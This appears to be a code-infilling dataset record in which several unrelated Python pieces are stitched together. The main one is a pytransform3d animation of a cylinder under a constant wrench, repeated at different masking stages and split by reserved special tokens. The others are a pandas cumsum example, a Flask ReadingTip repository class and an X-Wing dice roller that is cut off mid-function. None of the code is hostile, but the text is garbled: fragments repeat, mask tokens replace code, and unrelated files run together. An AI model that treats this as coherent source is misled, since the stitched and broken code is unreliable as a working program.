Stheta_ddot = np.dot(inertia_inv, wrench_in_cylinder)
Stheta_dot += dt * Stheta_ddot
cylinder2world = transform_from_exponential_coordinates(dt * Stheta_dot
).dot(prev_cylinder2world)
cylinder_frame.set_data(cylinder2world)
cylinder.set_data(cylinder2world)
prev_cylinder2world[:, :] = cylinder2world
return cylinder_frame, cylinder
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def spatial_inertia_of_cylinder(mass, length, radius):
I_xx = I_yy = 0.25 * mass * radius ** 2 + 1.0 / 12.0 * mass * length ** 2
I_zz = 0.5 * mass * radius ** 2
inertia = np.eye(6)
inertia[:3, :3] *= np.array([I_xx, I_yy, I_zz])
inertia[3:, 3:] *= mass
return inertia
def animation_callback(step, cylinder, cylinder_frame, prev_cylinder2world,
Stheta_dot, inertia_inv):
if step == 0:
prev_cylinder2world[:, :] = np.eye(4)
Stheta_dot[:] = 0.0
wrench_in_cylinder = np.array([0.1, 0.001, 0.001, 0.01, 1.0, 1.0])
dt = 0.0005
Stheta_ddot = np.dot(inertia_inv, wrench_in_cylinder)
Stheta_dot += dt * Stheta_ddot
cylinder2world = transform_from_exponential_coordinates(dt * Stheta_dot
).dot(prev_cylinder2world)
cylinder_frame.set_data(cylinder2world)
cylinder.set_data(cylinder2world)
prev_cylinder2world[:, :] = cylinder2world
return cylinder_frame, cylinder
<|reserved_special_token_0|>
fig.plot_transform(A2B=np.eye(4), s=0.5)
fig.view_init()
if '__file__' in globals():
fig.animate(animation_callback, n_frames=10000, fargs=(cylinder,
cylinder_frame, cylinder2world, twist, inertia_inv), loop=True)
fig.show()
else:
fig.save_image('__open3d_rendered_image.jpg')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def spatial_inertia_of_cylinder(mass, length, radius):
I_xx = I_yy = 0.25 * mass * radius ** 2 + 1.0 / 12.0 * mass * length ** 2
I_zz = 0.5 * mass * radius ** 2
inertia = np.eye(6)
inertia[:3, :3] *= np.array([I_xx, I_yy, I_zz])
inertia[3:, 3:] *= mass
return inertia
def animation_callback(step, cylinder, cylinder_frame, prev_cylinder2world,
Stheta_dot, inertia_inv):
if step == 0:
prev_cylinder2world[:, :] = np.eye(4)
Stheta_dot[:] = 0.0
wrench_in_cylinder = np.array([0.1, 0.001, 0.001, 0.01, 1.0, 1.0])
dt = 0.0005
Stheta_ddot = np.dot(inertia_inv, wrench_in_cylinder)
Stheta_dot += dt * Stheta_ddot
cylinder2world = transform_from_exponential_coordinates(dt * Stheta_dot
).dot(prev_cylinder2world)
cylinder_frame.set_data(cylinder2world)
cylinder.set_data(cylinder2world)
prev_cylinder2world[:, :] = cylinder2world
return cylinder_frame, cylinder
fig = pv.figure()
mass = 1.0
length = 0.5
radius = 0.1
inertia_inv = np.linalg.inv(spatial_inertia_of_cylinder(mass=mass, length=
length, radius=radius))
cylinder2world = np.eye(4)
twist = np.zeros(6)
cylinder = fig.plot_cylinder(length=length, radius=radius, c=[1, 0.5, 0])
cylinder_frame = fig.plot_transform(A2B=cylinder2world, s=0.5)
fig.plot_transform(A2B=np.eye(4), s=0.5)
fig.view_init()
if '__file__' in globals():
fig.animate(animation_callback, n_frames=10000, fargs=(cylinder,
cylinder_frame, cylinder2world, twist, inertia_inv), loop=True)
fig.show()
else:
fig.save_image('__open3d_rendered_image.jpg')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import numpy as np
from pytransform3d.transformations import transform_from_exponential_coordinates
import pytransform3d.visualizer as pv
def spatial_inertia_of_cylinder(mass, length, radius):
I_xx = I_yy = 0.25 * mass * radius ** 2 + 1.0 / 12.0 * mass * length ** 2
I_zz = 0.5 * mass * radius ** 2
inertia = np.eye(6)
inertia[:3, :3] *= np.array([I_xx, I_yy, I_zz])
inertia[3:, 3:] *= mass
return inertia
def animation_callback(step, cylinder, cylinder_frame, prev_cylinder2world,
Stheta_dot, inertia_inv):
if step == 0:
prev_cylinder2world[:, :] = np.eye(4)
Stheta_dot[:] = 0.0
wrench_in_cylinder = np.array([0.1, 0.001, 0.001, 0.01, 1.0, 1.0])
dt = 0.0005
Stheta_ddot = np.dot(inertia_inv, wrench_in_cylinder)
Stheta_dot += dt * Stheta_ddot
cylinder2world = transform_from_exponential_coordinates(dt * Stheta_dot
).dot(prev_cylinder2world)
cylinder_frame.set_data(cylinder2world)
cylinder.set_data(cylinder2world)
prev_cylinder2world[:, :] = cylinder2world
return cylinder_frame, cylinder
fig = pv.figure()
mass = 1.0
length = 0.5
radius = 0.1
inertia_inv = np.linalg.inv(spatial_inertia_of_cylinder(mass=mass, length=
length, radius=radius))
cylinder2world = np.eye(4)
twist = np.zeros(6)
cylinder = fig.plot_cylinder(length=length, radius=radius, c=[1, 0.5, 0])
cylinder_frame = fig.plot_transform(A2B=cylinder2world, s=0.5)
fig.plot_transform(A2B=np.eye(4), s=0.5)
fig.view_init()
if '__file__' in globals():
fig.animate(animation_callback, n_frames=10000, fargs=(cylinder,
cylinder_frame, cylinder2world, twist, inertia_inv), loop=True)
fig.show()
else:
fig.save_image('__open3d_rendered_image.jpg')
<|reserved_special_token_1|>
"""
==============================
Visualize Cylinder with Wrench
==============================
We apply a constant body-fixed wrench to a cylinder and integrate
acceleration to twist and exponential coordinates of transformation
to finally compute the new pose of the cylinder.
"""
import numpy as np
from pytransform3d.transformations import (
transform_from_exponential_coordinates)
import pytransform3d.visualizer as pv
def spatial_inertia_of_cylinder(mass, length, radius):
I_xx = I_yy = 0.25 * mass * radius ** 2 + 1.0 / 12.0 * mass * length ** 2
I_zz = 0.5 * mass * radius ** 2
inertia = np.eye(6)
inertia[:3, :3] *= np.array([I_xx, I_yy, I_zz])
inertia[3:, 3:] *= mass
return inertia
def animation_callback(
step, cylinder, cylinder_frame, prev_cylinder2world,
Stheta_dot, inertia_inv):
if step == 0: # Reset cylinder state
prev_cylinder2world[:, :] = np.eye(4)
Stheta_dot[:] = 0.0
# Apply constant wrench
wrench_in_cylinder = np.array([0.1, 0.001, 0.001, 0.01, 1.0, 1.0])
dt = 0.0005
Stheta_ddot = np.dot(inertia_inv, wrench_in_cylinder)
Stheta_dot += dt * Stheta_ddot
cylinder2world = transform_from_exponential_coordinates(
dt * Stheta_dot).dot(prev_cylinder2world)
# Update visualization
cylinder_frame.set_data(cylinder2world)
cylinder.set_data(cylinder2world)
prev_cylinder2world[:, :] = cylinder2world
return cylinder_frame, cylinder
fig = pv.figure()
# Definition of cylinder
mass = 1.0
length = 0.5
radius = 0.1
inertia_inv = np.linalg.inv(
spatial_inertia_of_cylinder(mass=mass, length=length, radius=radius))
# State of cylinder
cylinder2world = np.eye(4)
twist = np.zeros(6)
cylinder = fig.plot_cylinder(length=length, radius=radius, c=[1, 0.5, 0])
cylinder_frame = fig.plot_transform(A2B=cylinder2world, s=0.5)
fig.plot_transform(A2B=np.eye(4), s=0.5)
fig.view_init()
if "__file__" in globals():
fig.animate(
animation_callback, n_frames=10000,
fargs=(cylinder, cylinder_frame, cylinder2world, twist, inertia_inv),
loop=True)
fig.show()
else:
fig.save_image("__open3d_rendered_image.jpg")
|
flexible
|
{
"blob_id": "2019a2a5588e57164ff4226ef3bcbbc506f2b315",
"index": 7432,
"step-1": "<mask token>\n\n\ndef animation_callback(step, cylinder, cylinder_frame, prev_cylinder2world,\n Stheta_dot, inertia_inv):\n if step == 0:\n prev_cylinder2world[:, :] = np.eye(4)\n Stheta_dot[:] = 0.0\n wrench_in_cylinder = np.array([0.1, 0.001, 0.001, 0.01, 1.0, 1.0])\n dt = 0.0005\n Stheta_ddot = np.dot(inertia_inv, wrench_in_cylinder)\n Stheta_dot += dt * Stheta_ddot\n cylinder2world = transform_from_exponential_coordinates(dt * Stheta_dot\n ).dot(prev_cylinder2world)\n cylinder_frame.set_data(cylinder2world)\n cylinder.set_data(cylinder2world)\n prev_cylinder2world[:, :] = cylinder2world\n return cylinder_frame, cylinder\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef spatial_inertia_of_cylinder(mass, length, radius):\n I_xx = I_yy = 0.25 * mass * radius ** 2 + 1.0 / 12.0 * mass * length ** 2\n I_zz = 0.5 * mass * radius ** 2\n inertia = np.eye(6)\n inertia[:3, :3] *= np.array([I_xx, I_yy, I_zz])\n inertia[3:, 3:] *= mass\n return inertia\n\n\ndef animation_callback(step, cylinder, cylinder_frame, prev_cylinder2world,\n Stheta_dot, inertia_inv):\n if step == 0:\n prev_cylinder2world[:, :] = np.eye(4)\n Stheta_dot[:] = 0.0\n wrench_in_cylinder = np.array([0.1, 0.001, 0.001, 0.01, 1.0, 1.0])\n dt = 0.0005\n Stheta_ddot = np.dot(inertia_inv, wrench_in_cylinder)\n Stheta_dot += dt * Stheta_ddot\n cylinder2world = transform_from_exponential_coordinates(dt * Stheta_dot\n ).dot(prev_cylinder2world)\n cylinder_frame.set_data(cylinder2world)\n cylinder.set_data(cylinder2world)\n prev_cylinder2world[:, :] = cylinder2world\n return cylinder_frame, cylinder\n\n\n<mask token>\nfig.plot_transform(A2B=np.eye(4), s=0.5)\nfig.view_init()\nif '__file__' in globals():\n fig.animate(animation_callback, n_frames=10000, fargs=(cylinder,\n cylinder_frame, cylinder2world, twist, inertia_inv), loop=True)\n fig.show()\nelse:\n fig.save_image('__open3d_rendered_image.jpg')\n",
"step-3": "<mask token>\n\n\ndef spatial_inertia_of_cylinder(mass, length, radius):\n I_xx = I_yy = 0.25 * mass * radius ** 2 + 1.0 / 12.0 * mass * length ** 2\n I_zz = 0.5 * mass * radius ** 2\n inertia = np.eye(6)\n inertia[:3, :3] *= np.array([I_xx, I_yy, I_zz])\n inertia[3:, 3:] *= mass\n return inertia\n\n\ndef animation_callback(step, cylinder, cylinder_frame, prev_cylinder2world,\n Stheta_dot, inertia_inv):\n if step == 0:\n prev_cylinder2world[:, :] = np.eye(4)\n Stheta_dot[:] = 0.0\n wrench_in_cylinder = np.array([0.1, 0.001, 0.001, 0.01, 1.0, 1.0])\n dt = 0.0005\n Stheta_ddot = np.dot(inertia_inv, wrench_in_cylinder)\n Stheta_dot += dt * Stheta_ddot\n cylinder2world = transform_from_exponential_coordinates(dt * Stheta_dot\n ).dot(prev_cylinder2world)\n cylinder_frame.set_data(cylinder2world)\n cylinder.set_data(cylinder2world)\n prev_cylinder2world[:, :] = cylinder2world\n return cylinder_frame, cylinder\n\n\nfig = pv.figure()\nmass = 1.0\nlength = 0.5\nradius = 0.1\ninertia_inv = np.linalg.inv(spatial_inertia_of_cylinder(mass=mass, length=\n length, radius=radius))\ncylinder2world = np.eye(4)\ntwist = np.zeros(6)\ncylinder = fig.plot_cylinder(length=length, radius=radius, c=[1, 0.5, 0])\ncylinder_frame = fig.plot_transform(A2B=cylinder2world, s=0.5)\nfig.plot_transform(A2B=np.eye(4), s=0.5)\nfig.view_init()\nif '__file__' in globals():\n fig.animate(animation_callback, n_frames=10000, fargs=(cylinder,\n cylinder_frame, cylinder2world, twist, inertia_inv), loop=True)\n fig.show()\nelse:\n fig.save_image('__open3d_rendered_image.jpg')\n",
"step-4": "<mask token>\nimport numpy as np\nfrom pytransform3d.transformations import transform_from_exponential_coordinates\nimport pytransform3d.visualizer as pv\n\n\ndef spatial_inertia_of_cylinder(mass, length, radius):\n I_xx = I_yy = 0.25 * mass * radius ** 2 + 1.0 / 12.0 * mass * length ** 2\n I_zz = 0.5 * mass * radius ** 2\n inertia = np.eye(6)\n inertia[:3, :3] *= np.array([I_xx, I_yy, I_zz])\n inertia[3:, 3:] *= mass\n return inertia\n\n\ndef animation_callback(step, cylinder, cylinder_frame, prev_cylinder2world,\n Stheta_dot, inertia_inv):\n if step == 0:\n prev_cylinder2world[:, :] = np.eye(4)\n Stheta_dot[:] = 0.0\n wrench_in_cylinder = np.array([0.1, 0.001, 0.001, 0.01, 1.0, 1.0])\n dt = 0.0005\n Stheta_ddot = np.dot(inertia_inv, wrench_in_cylinder)\n Stheta_dot += dt * Stheta_ddot\n cylinder2world = transform_from_exponential_coordinates(dt * Stheta_dot\n ).dot(prev_cylinder2world)\n cylinder_frame.set_data(cylinder2world)\n cylinder.set_data(cylinder2world)\n prev_cylinder2world[:, :] = cylinder2world\n return cylinder_frame, cylinder\n\n\nfig = pv.figure()\nmass = 1.0\nlength = 0.5\nradius = 0.1\ninertia_inv = np.linalg.inv(spatial_inertia_of_cylinder(mass=mass, length=\n length, radius=radius))\ncylinder2world = np.eye(4)\ntwist = np.zeros(6)\ncylinder = fig.plot_cylinder(length=length, radius=radius, c=[1, 0.5, 0])\ncylinder_frame = fig.plot_transform(A2B=cylinder2world, s=0.5)\nfig.plot_transform(A2B=np.eye(4), s=0.5)\nfig.view_init()\nif '__file__' in globals():\n fig.animate(animation_callback, n_frames=10000, fargs=(cylinder,\n cylinder_frame, cylinder2world, twist, inertia_inv), loop=True)\n fig.show()\nelse:\n fig.save_image('__open3d_rendered_image.jpg')\n",
"step-5": "\"\"\"\n==============================\nVisualize Cylinder with Wrench\n==============================\n\nWe apply a constant body-fixed wrench to a cylinder and integrate\nacceleration to twist and exponential coordinates of transformation\nto finally compute the new pose of the cylinder.\n\"\"\"\nimport numpy as np\nfrom pytransform3d.transformations import (\n transform_from_exponential_coordinates)\nimport pytransform3d.visualizer as pv\n\n\ndef spatial_inertia_of_cylinder(mass, length, radius):\n I_xx = I_yy = 0.25 * mass * radius ** 2 + 1.0 / 12.0 * mass * length ** 2\n I_zz = 0.5 * mass * radius ** 2\n inertia = np.eye(6)\n inertia[:3, :3] *= np.array([I_xx, I_yy, I_zz])\n inertia[3:, 3:] *= mass\n return inertia\n\n\ndef animation_callback(\n step, cylinder, cylinder_frame, prev_cylinder2world,\n Stheta_dot, inertia_inv):\n if step == 0: # Reset cylinder state\n prev_cylinder2world[:, :] = np.eye(4)\n Stheta_dot[:] = 0.0\n\n # Apply constant wrench\n wrench_in_cylinder = np.array([0.1, 0.001, 0.001, 0.01, 1.0, 1.0])\n dt = 0.0005\n\n Stheta_ddot = np.dot(inertia_inv, wrench_in_cylinder)\n Stheta_dot += dt * Stheta_ddot\n cylinder2world = transform_from_exponential_coordinates(\n dt * Stheta_dot).dot(prev_cylinder2world)\n\n # Update visualization\n cylinder_frame.set_data(cylinder2world)\n cylinder.set_data(cylinder2world)\n\n prev_cylinder2world[:, :] = cylinder2world\n\n return cylinder_frame, cylinder\n\n\nfig = pv.figure()\n\n# Definition of cylinder\nmass = 1.0\nlength = 0.5\nradius = 0.1\ninertia_inv = np.linalg.inv(\n spatial_inertia_of_cylinder(mass=mass, length=length, radius=radius))\n\n# State of cylinder\ncylinder2world = np.eye(4)\ntwist = np.zeros(6)\n\ncylinder = fig.plot_cylinder(length=length, radius=radius, c=[1, 0.5, 0])\ncylinder_frame = fig.plot_transform(A2B=cylinder2world, s=0.5)\n\nfig.plot_transform(A2B=np.eye(4), s=0.5)\n\nfig.view_init()\n\nif \"__file__\" in globals():\n fig.animate(\n animation_callback, n_frames=10000,\n fargs=(cylinder, cylinder_frame, cylinder2world, twist, inertia_inv),\n loop=True)\n fig.show()\nelse:\n fig.save_image(\"__open3d_rendered_image.jpg\")\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
# 代码3-14 pandas累积统计特征函数、移动窗口统计函数示例
import pandas as pd
D = pd.Series(range(0, 20)) # 构造Series,内容为0~19共20个整数
print(D.cumsum()) # 给出前n项和
print(D.rolling(2).sum()) # 依次对相邻两项求和
|
normal
|
{
"blob_id": "7639b80c9e6e1b2e1e55a47a862c433b64168cf6",
"index": 7475,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(D.cumsum())\nprint(D.rolling(2).sum())\n",
"step-3": "<mask token>\nD = pd.Series(range(0, 20))\nprint(D.cumsum())\nprint(D.rolling(2).sum())\n",
"step-4": "import pandas as pd\nD = pd.Series(range(0, 20))\nprint(D.cumsum())\nprint(D.rolling(2).sum())\n",
"step-5": "# 代码3-14 pandas累积统计特征函数、移动窗口统计函数示例\n\nimport pandas as pd\n\nD = pd.Series(range(0, 20)) # 构造Series,内容为0~19共20个整数\nprint(D.cumsum()) # 给出前n项和\nprint(D.rolling(2).sum()) # 依次对相邻两项求和\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class ReadingTipRepository:
<|reserved_special_token_0|>
def get_tips(self, user, tag='all'):
if tag == 'all':
return ReadingTip.query.filter_by(user=user).all()
else:
return ReadingTip.query.filter_by(user=user).filter(ReadingTip.
tags.any(name=tag)).all()
<|reserved_special_token_0|>
def create_tip(self, tip):
db.session.add(tip)
db.session.commit()
return tip
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def read_tip(self, tip, date):
ReadingTip.query.filter_by(id=tip.id).update({'read': date})
db.session.commit()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ReadingTipRepository:
<|reserved_special_token_0|>
def get_tips(self, user, tag='all'):
if tag == 'all':
return ReadingTip.query.filter_by(user=user).all()
else:
return ReadingTip.query.filter_by(user=user).filter(ReadingTip.
tags.any(name=tag)).all()
def update_tip(self, tip_id, title, link, tags):
tip = self.get_tip(tip_id)
print(tags)
tip.title = title
tip.link = link
tip.tags = tags
db.session.commit()
def create_tip(self, tip):
db.session.add(tip)
db.session.commit()
return tip
<|reserved_special_token_0|>
def delete_tip(self, tip):
db.session.delete(tip)
db.session.commit()
def contains_title(self, user, title):
amount = ReadingTip.query.filter_by(user=user, title=title).count()
return amount > 0
def read_tip(self, tip, date):
ReadingTip.query.filter_by(id=tip.id).update({'read': date})
db.session.commit()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ReadingTipRepository:
def __init__(self):
pass
def get_tips(self, user, tag='all'):
if tag == 'all':
return ReadingTip.query.filter_by(user=user).all()
else:
return ReadingTip.query.filter_by(user=user).filter(ReadingTip.
tags.any(name=tag)).all()
def update_tip(self, tip_id, title, link, tags):
tip = self.get_tip(tip_id)
print(tags)
tip.title = title
tip.link = link
tip.tags = tags
db.session.commit()
def create_tip(self, tip):
db.session.add(tip)
db.session.commit()
return tip
def get_tip(self, tip_id):
return ReadingTip.query.get(tip_id)
def delete_tip(self, tip):
db.session.delete(tip)
db.session.commit()
def contains_title(self, user, title):
amount = ReadingTip.query.filter_by(user=user, title=title).count()
return amount > 0
def read_tip(self, tip, date):
ReadingTip.query.filter_by(id=tip.id).update({'read': date})
db.session.commit()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from models.readingtip import ReadingTip
from database import db
class ReadingTipRepository:
def __init__(self):
pass
def get_tips(self, user, tag='all'):
if tag == 'all':
return ReadingTip.query.filter_by(user=user).all()
else:
return ReadingTip.query.filter_by(user=user).filter(ReadingTip.
tags.any(name=tag)).all()
def update_tip(self, tip_id, title, link, tags):
tip = self.get_tip(tip_id)
print(tags)
tip.title = title
tip.link = link
tip.tags = tags
db.session.commit()
def create_tip(self, tip):
db.session.add(tip)
db.session.commit()
return tip
def get_tip(self, tip_id):
return ReadingTip.query.get(tip_id)
def delete_tip(self, tip):
db.session.delete(tip)
db.session.commit()
def contains_title(self, user, title):
amount = ReadingTip.query.filter_by(user=user, title=title).count()
return amount > 0
def read_tip(self, tip, date):
ReadingTip.query.filter_by(id=tip.id).update({'read': date})
db.session.commit()
readingtip_repository = ReadingTipRepository()
<|reserved_special_token_1|>
from models.readingtip import ReadingTip
from database import db
class ReadingTipRepository:
def __init__(self):
pass
def get_tips(self, user, tag="all"):
if tag == "all":
return ReadingTip.query.filter_by(user=user).all()
else:
return ReadingTip.query.filter_by(user=user).filter(ReadingTip.tags.any(name=tag)).all()
def update_tip(self, tip_id, title, link, tags):
tip = self.get_tip(tip_id)
print(tags)
tip.title = title
tip.link = link
tip.tags = tags
db.session.commit()
def create_tip(self, tip):
db.session.add(tip)
db.session.commit()
return tip
def get_tip(self, tip_id):
return ReadingTip.query.get(tip_id)
def delete_tip(self, tip):
db.session.delete(tip)
db.session.commit()
def contains_title(self, user, title):
amount = ReadingTip.query.filter_by(user=user, title=title).count()
return amount > 0
def read_tip(self, tip, date):
ReadingTip.query.filter_by(id=tip.id).update({"read":date})
db.session.commit()
readingtip_repository = ReadingTipRepository()
|
flexible
|
{
"blob_id": "d82b68d5c83ae538d7a8b5ae5547b43ac4e8a3d4",
"index": 6910,
"step-1": "<mask token>\n\n\nclass ReadingTipRepository:\n <mask token>\n\n def get_tips(self, user, tag='all'):\n if tag == 'all':\n return ReadingTip.query.filter_by(user=user).all()\n else:\n return ReadingTip.query.filter_by(user=user).filter(ReadingTip.\n tags.any(name=tag)).all()\n <mask token>\n\n def create_tip(self, tip):\n db.session.add(tip)\n db.session.commit()\n return tip\n <mask token>\n <mask token>\n <mask token>\n\n def read_tip(self, tip, date):\n ReadingTip.query.filter_by(id=tip.id).update({'read': date})\n db.session.commit()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ReadingTipRepository:\n <mask token>\n\n def get_tips(self, user, tag='all'):\n if tag == 'all':\n return ReadingTip.query.filter_by(user=user).all()\n else:\n return ReadingTip.query.filter_by(user=user).filter(ReadingTip.\n tags.any(name=tag)).all()\n\n def update_tip(self, tip_id, title, link, tags):\n tip = self.get_tip(tip_id)\n print(tags)\n tip.title = title\n tip.link = link\n tip.tags = tags\n db.session.commit()\n\n def create_tip(self, tip):\n db.session.add(tip)\n db.session.commit()\n return tip\n <mask token>\n\n def delete_tip(self, tip):\n db.session.delete(tip)\n db.session.commit()\n\n def contains_title(self, user, title):\n amount = ReadingTip.query.filter_by(user=user, title=title).count()\n return amount > 0\n\n def read_tip(self, tip, date):\n ReadingTip.query.filter_by(id=tip.id).update({'read': date})\n db.session.commit()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ReadingTipRepository:\n\n def __init__(self):\n pass\n\n def get_tips(self, user, tag='all'):\n if tag == 'all':\n return ReadingTip.query.filter_by(user=user).all()\n else:\n return ReadingTip.query.filter_by(user=user).filter(ReadingTip.\n tags.any(name=tag)).all()\n\n def update_tip(self, tip_id, title, link, tags):\n tip = self.get_tip(tip_id)\n print(tags)\n tip.title = title\n tip.link = link\n tip.tags = tags\n db.session.commit()\n\n def create_tip(self, tip):\n db.session.add(tip)\n db.session.commit()\n return tip\n\n def get_tip(self, tip_id):\n return ReadingTip.query.get(tip_id)\n\n def delete_tip(self, tip):\n db.session.delete(tip)\n db.session.commit()\n\n def contains_title(self, user, title):\n amount = ReadingTip.query.filter_by(user=user, title=title).count()\n return amount > 0\n\n def read_tip(self, tip, date):\n ReadingTip.query.filter_by(id=tip.id).update({'read': date})\n db.session.commit()\n\n\n<mask token>\n",
"step-4": "from models.readingtip import ReadingTip\nfrom database import db\n\n\nclass ReadingTipRepository:\n\n def __init__(self):\n pass\n\n def get_tips(self, user, tag='all'):\n if tag == 'all':\n return ReadingTip.query.filter_by(user=user).all()\n else:\n return ReadingTip.query.filter_by(user=user).filter(ReadingTip.\n tags.any(name=tag)).all()\n\n def update_tip(self, tip_id, title, link, tags):\n tip = self.get_tip(tip_id)\n print(tags)\n tip.title = title\n tip.link = link\n tip.tags = tags\n db.session.commit()\n\n def create_tip(self, tip):\n db.session.add(tip)\n db.session.commit()\n return tip\n\n def get_tip(self, tip_id):\n return ReadingTip.query.get(tip_id)\n\n def delete_tip(self, tip):\n db.session.delete(tip)\n db.session.commit()\n\n def contains_title(self, user, title):\n amount = ReadingTip.query.filter_by(user=user, title=title).count()\n return amount > 0\n\n def read_tip(self, tip, date):\n ReadingTip.query.filter_by(id=tip.id).update({'read': date})\n db.session.commit()\n\n\nreadingtip_repository = ReadingTipRepository()\n",
"step-5": "from models.readingtip import ReadingTip\nfrom database import db\n\nclass ReadingTipRepository:\n def __init__(self):\n pass\n\n def get_tips(self, user, tag=\"all\"):\n if tag == \"all\":\n return ReadingTip.query.filter_by(user=user).all()\n else:\n return ReadingTip.query.filter_by(user=user).filter(ReadingTip.tags.any(name=tag)).all()\n\n def update_tip(self, tip_id, title, link, tags):\n tip = self.get_tip(tip_id)\n print(tags)\n tip.title = title\n tip.link = link\n tip.tags = tags\n db.session.commit()\n\n def create_tip(self, tip):\n db.session.add(tip)\n db.session.commit()\n return tip\n\n def get_tip(self, tip_id):\n return ReadingTip.query.get(tip_id)\n\n def delete_tip(self, tip):\n db.session.delete(tip)\n db.session.commit()\n\n def contains_title(self, user, title):\n amount = ReadingTip.query.filter_by(user=user, title=title).count()\n return amount > 0\n\n def read_tip(self, tip, date):\n ReadingTip.query.filter_by(id=tip.id).update({\"read\":date})\n db.session.commit()\n\nreadingtip_repository = ReadingTipRepository()\n",
"step-ids": [
4,
7,
9,
11,
12
]
}
|
[
4,
7,
9,
11,
12
] |
<|reserved_special_token_0|>
class result(Enum):
CRIT = 16
HIT = 8
EVADE = 4
FOCUS = 2
BLANK = 1
<|reserved_special_token_0|>
class die:
def __init__(self):
self.rerolled = False
def __str__(self):
return result_str(self.result)
@staticmethod
def __roll_die__(face_list):
return face_list[randint(0, 8)]
def equals(self, result):
return self.result & result
def change(self, to):
self.result = to
class attack_die(die):
def __init__(self):
die.__init__(self)
self.__roll__()
def __roll__(self):
self.result = self.__roll_die__(__attack_die_faces__)
def reroll(self):
if not self.rerolled:
self.__roll__()
self.rerolled = True
return True
return False
class evade_die(die):
def __init__(self):
die.__init__(self)
self.__roll__()
def __roll__(self):
self.result = die.__roll_die__(__evade_die_faces__)
def reroll(self):
if not self.rerolled:
self.__roll__()
self.rerolled = True
return True
return False
<|reserved_special_token_0|>
class perform(Enum):
FOR_ALL = 7
ONCE = 1
class change:
def __init__(self, rule, from_result, to_result):
self.rule = rule
self.from_result = from_result
self.to_result = to_result
def modify_dice_list(self, dice_list):
for i in range(len(dice_list)):
if dice_list[i].equals(self.from_result):
dice_list[i].change(self.to_result)
if self.rule == perform.ONCE:
return dice_list
return dice_list
class reroll:
def __init__(self, rule, from_result):
self.rule = rule
self.from_result = from_result
def modify_dice_list(self, dice_list):
for i in range(len(dice_list)):
if dice_list[i].equals(self.from_result):
if dice_list[i].reroll() and self.rule == perform.ONCE:
return dice_list
return dice_list
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class result(Enum):
CRIT = 16
HIT = 8
EVADE = 4
FOCUS = 2
BLANK = 1
<|reserved_special_token_0|>
class die:
def __init__(self):
self.rerolled = False
def __str__(self):
return result_str(self.result)
@staticmethod
def __roll_die__(face_list):
return face_list[randint(0, 8)]
def equals(self, result):
return self.result & result
def change(self, to):
self.result = to
class attack_die(die):
def __init__(self):
die.__init__(self)
self.__roll__()
def __roll__(self):
self.result = self.__roll_die__(__attack_die_faces__)
def reroll(self):
if not self.rerolled:
self.__roll__()
self.rerolled = True
return True
return False
class evade_die(die):
def __init__(self):
die.__init__(self)
self.__roll__()
def __roll__(self):
self.result = die.__roll_die__(__evade_die_faces__)
def reroll(self):
if not self.rerolled:
self.__roll__()
self.rerolled = True
return True
return False
<|reserved_special_token_0|>
def roll_evade_dice(number):
dice_results = []
for i in range(number):
dice_results.append(evade_die())
return dice_results
class perform(Enum):
FOR_ALL = 7
ONCE = 1
class change:
def __init__(self, rule, from_result, to_result):
self.rule = rule
self.from_result = from_result
self.to_result = to_result
def modify_dice_list(self, dice_list):
for i in range(len(dice_list)):
if dice_list[i].equals(self.from_result):
dice_list[i].change(self.to_result)
if self.rule == perform.ONCE:
return dice_list
return dice_list
class reroll:
def __init__(self, rule, from_result):
self.rule = rule
self.from_result = from_result
def modify_dice_list(self, dice_list):
for i in range(len(dice_list)):
if dice_list[i].equals(self.from_result):
if dice_list[i].reroll() and self.rule == perform.ONCE:
return dice_list
return dice_list
<|reserved_special_token_0|>
def average_chance(chance_list):
avg = 0.0
for i in range(1, len(chance_list)):
avg = avg + i * chance_list[i]
return avg
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class result(Enum):
CRIT = 16
HIT = 8
EVADE = 4
FOCUS = 2
BLANK = 1
def result_str(res):
str = ''
if res & result.BLANK:
str += 'BLANK'
if res & result.FOCUS:
if len(str):
str += '|'
str += 'FOCUS'
if res & result.HIT:
if len(str):
str += '|'
str += 'HIT'
if res & result.CRIT:
if len(str):
str += '|'
str += 'CRIT'
if res & result.EVADE:
if len(str):
str += '|'
str += 'EVADE'
return str
<|reserved_special_token_0|>
class die:
def __init__(self):
self.rerolled = False
def __str__(self):
return result_str(self.result)
@staticmethod
def __roll_die__(face_list):
return face_list[randint(0, 8)]
def equals(self, result):
return self.result & result
def change(self, to):
self.result = to
class attack_die(die):
def __init__(self):
die.__init__(self)
self.__roll__()
def __roll__(self):
self.result = self.__roll_die__(__attack_die_faces__)
def reroll(self):
if not self.rerolled:
self.__roll__()
self.rerolled = True
return True
return False
class evade_die(die):
def __init__(self):
die.__init__(self)
self.__roll__()
def __roll__(self):
self.result = die.__roll_die__(__evade_die_faces__)
def reroll(self):
if not self.rerolled:
self.__roll__()
self.rerolled = True
return True
return False
<|reserved_special_token_0|>
def roll_evade_dice(number):
dice_results = []
for i in range(number):
dice_results.append(evade_die())
return dice_results
class perform(Enum):
FOR_ALL = 7
ONCE = 1
class change:
def __init__(self, rule, from_result, to_result):
self.rule = rule
self.from_result = from_result
self.to_result = to_result
def modify_dice_list(self, dice_list):
for i in range(len(dice_list)):
if dice_list[i].equals(self.from_result):
dice_list[i].change(self.to_result)
if self.rule == perform.ONCE:
return dice_list
return dice_list
class reroll:
def __init__(self, rule, from_result):
self.rule = rule
self.from_result = from_result
def modify_dice_list(self, dice_list):
for i in range(len(dice_list)):
if dice_list[i].equals(self.from_result):
if dice_list[i].reroll() and self.rule == perform.ONCE:
return dice_list
